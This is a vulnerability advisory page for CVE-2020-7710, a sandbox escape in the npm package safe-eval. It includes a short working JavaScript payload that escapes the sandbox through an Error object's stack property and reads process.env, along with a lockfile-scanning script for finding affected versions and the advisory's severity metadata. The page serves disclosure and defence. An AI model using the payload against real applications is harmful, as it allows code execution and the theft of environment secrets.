Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWhycHEtcjM5OS13aGd3
Sandbox Breakout / Arbitrary Code Execution in safe-eval
All versions of safe-eval are vulnerable to a sandbox escape leading to remote code execution. The package fails to restrict access to the main context through Error objects, which may allow attackers to execute arbitrary code on the system.
Evaluating the payload

    (function () {
      var ex = new Error
      ex.__proto__ = null
      ex.stack = {
        match: x => {
          return x.constructor.constructor("throw process.env")()
        }
      }
      return ex
    })()

prints the contents of process.env.
Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
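Because every released version is affected and no fixed release exists, the practical response is to find where safe-eval is pinned. The script below is an added example (not the advisory's or the safe-eval project's own code) that walks a parsed package-lock.json, including nested copies under other dependencies, and flags entries in the <= 0.4.1 range; the lockfile it scans is constructed sample data.

```javascript
// Added example (not the advisory's or safe-eval's own code): find safe-eval
// entries in a package-lock.json that fall in the affected range (<= 0.4.1).
const AFFECTED_MAX = [0, 4, 1]; // upper bound from GHSA-hrpq-r399-whgw, no fix
// Parse "major.minor.patch"; null for anything else (pre-release tags, ranges)
// so an unparsed version is never mistaken for a safe one.
function parseSemver(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)$/.exec(String(v).trim());
  return m ? m.slice(1).map(Number) : null;
}
// true = affected, false = above the range, null = could not determine.
function isAffectedVersion(version) {
  const p = parseSemver(version);
  if (!p) return null;
  for (let i = 0; i < 3; i++) {
    if (p[i] !== AFFECTED_MAX[i]) return p[i] < AFFECTED_MAX[i];
  }
  return true; // exactly 0.4.1
}

// Walk a parsed package-lock.json (lockfileVersion 1, 2 or 3) and report every
// safe-eval entry, including nested copies under other dependencies.
function findSafeEval(lock) {
  const hits = [];
  const record = (path, { version }) =>
    hits.push({ path, version, affected: isAffectedVersion(version) });
  if (lock.packages) { // v2/v3: flat map keyed by install path
    for (const [path, entry] of Object.entries(lock.packages)) {
      if (path.endsWith("node_modules/safe-eval")) record(path, entry);
    }
  } else { // v1: nested "dependencies" tree
    const walk = (deps, prefix) => {
      for (const [name, entry] of Object.entries(deps || {})) {
        const path = `${prefix}node_modules/${name}`;
        if (name === "safe-eval") record(path, entry);
        walk(entry.dependencies, `${path}/`);
      }
    };
    walk(lock.dependencies, "");
  }
  return hits;
}
// Constructed sample lockfile (not from a real project) with two copies.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "node_modules/safe-eval": { version: "0.4.1" },
    "node_modules/some-lib/node_modules/safe-eval": { version: "0.3.0" },
  },
};
```

To run it against a real tree, pass `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))` to findSafeEval; a null affected value means the version string needs manual review.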
Permalink: https://github.com/advisories/GHSA-hrpq-r399-whgw
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWhycHEtcjM5OS13aGd3
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: over 4 years ago
Updated: over 1 year ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Percentage: 0.01108
EPSS Percentile: 0.84245
Identifiers: GHSA-hrpq-r399-whgw, CVE-2020-7710
References:
- https://nvd.nist.gov/vuln/detail/CVE-2020-7710
- https://github.com/hacksparrow/safe-eval/issues/19
- https://snyk.io/vuln/SNYK-JS-SAFEEVAL-608076
- https://www.npmjs.com/advisories/1322
- https://github.com/advisories/GHSA-hrpq-r399-whgw
Blast Radius: 33.7
Affected Packages
npm:safe-eval
Dependent packages: 264
Dependent repositories: 2,730
Downloads: 90,859 last month
Affected Version Ranges: <= 0.4.1
No known fixed version
All affected versions: 0.0.0, 0.1.0, 0.2.0, 0.3.0, 0.4.0, 0.4.1